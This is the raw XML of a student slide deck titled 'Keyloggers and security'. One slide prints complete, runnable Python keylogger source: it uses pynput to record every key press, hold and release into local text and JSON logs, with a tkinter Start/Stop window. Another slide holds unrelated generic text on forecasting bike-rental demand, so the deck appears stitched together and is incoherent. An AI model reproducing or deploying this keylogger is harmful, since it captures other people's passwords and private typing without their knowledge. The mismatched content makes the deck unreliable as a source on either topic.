        <p:spPr>
          <a:xfrm>
            <a:off x="441671" y="1087378"/>
            <a:ext cx="11613485" cy="5563973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>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Data Collection:</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Gather historical data on bike rentals, including time, date, location, and other relevant factors.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Utilize real-time data sources, such as weather conditions, events, and holidays, to enhance prediction accuracy.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Data Preprocessing:</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Clean and preprocess the collected data to handle missing values, outliers, and inconsistencies.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Feature engineering to extract relevant features from the data that might impact bike demand.</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Machine Learning Algorithm:</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Implement a machine learning algorithm, such as a time-series forecasting model (e.g., ARIMA, SARIMA, or LSTM), to predict bike counts based on historical patterns.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Consider incorporating other factors like weather conditions, day of the week, and special events to improve prediction accuracy.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Deployment:</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Develop a user-friendly interface or application that provides real-time predictions for bike counts at different hours.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Deploy the solution on a scalable and reliable platform, considering factors like server infrastructure, response time, and user accessibility.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Evaluation:</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Assess the model's performance using appropriate metrics such as Mean Absolute Error (MAE), Root Mean Squared Error (RMSE), or other relevant metrics.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Fine-tune the model based on feedback and continuous monitoring of prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1">
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Result:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="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1048602" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>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endParaRPr lang="en-IN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Library required to build the model</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1">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lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048604" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>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79" name="Title 1048678"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="02A5E3"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048680" name="Content Placeholder 1048679"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295836" y="1601516"/>
            <a:ext cx="5194767" cy="4469572"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>import json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>keys_used = []</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def generate_text_log(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys.write(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def generate_json_file(keys_used):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        key_log.write(key_list_bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def on_press(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        flag = True</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def on_release(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener.start()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    stop_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.title("Keylogger")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label.pack()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>start_button.pack(side=LEFT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>stop_button.pack(side=RIGHT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.geometry("250x250")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.mainloop()</a:t>
            </a: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fontScale="90000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048608" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>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1048610" name="Title 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535670" y="844659"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit fontScale="86364"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6238</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat/>
  <Paragraphs>143</Paragraphs>
  <Slides>11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SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Franklin Gothic Demi</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>Keyloggers and security</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Keyloggers and security</dc:title>
  <dc:creator>Vaibhav Ostwal</dc:creator>
  <cp:lastModifiedBy>Student</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-09T07:00:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-09T07:00:26Z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D47AA97208AA46799C67064A9492A1BC_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.16731</vt:lpwstr>
  </property>
</Properties>
</file>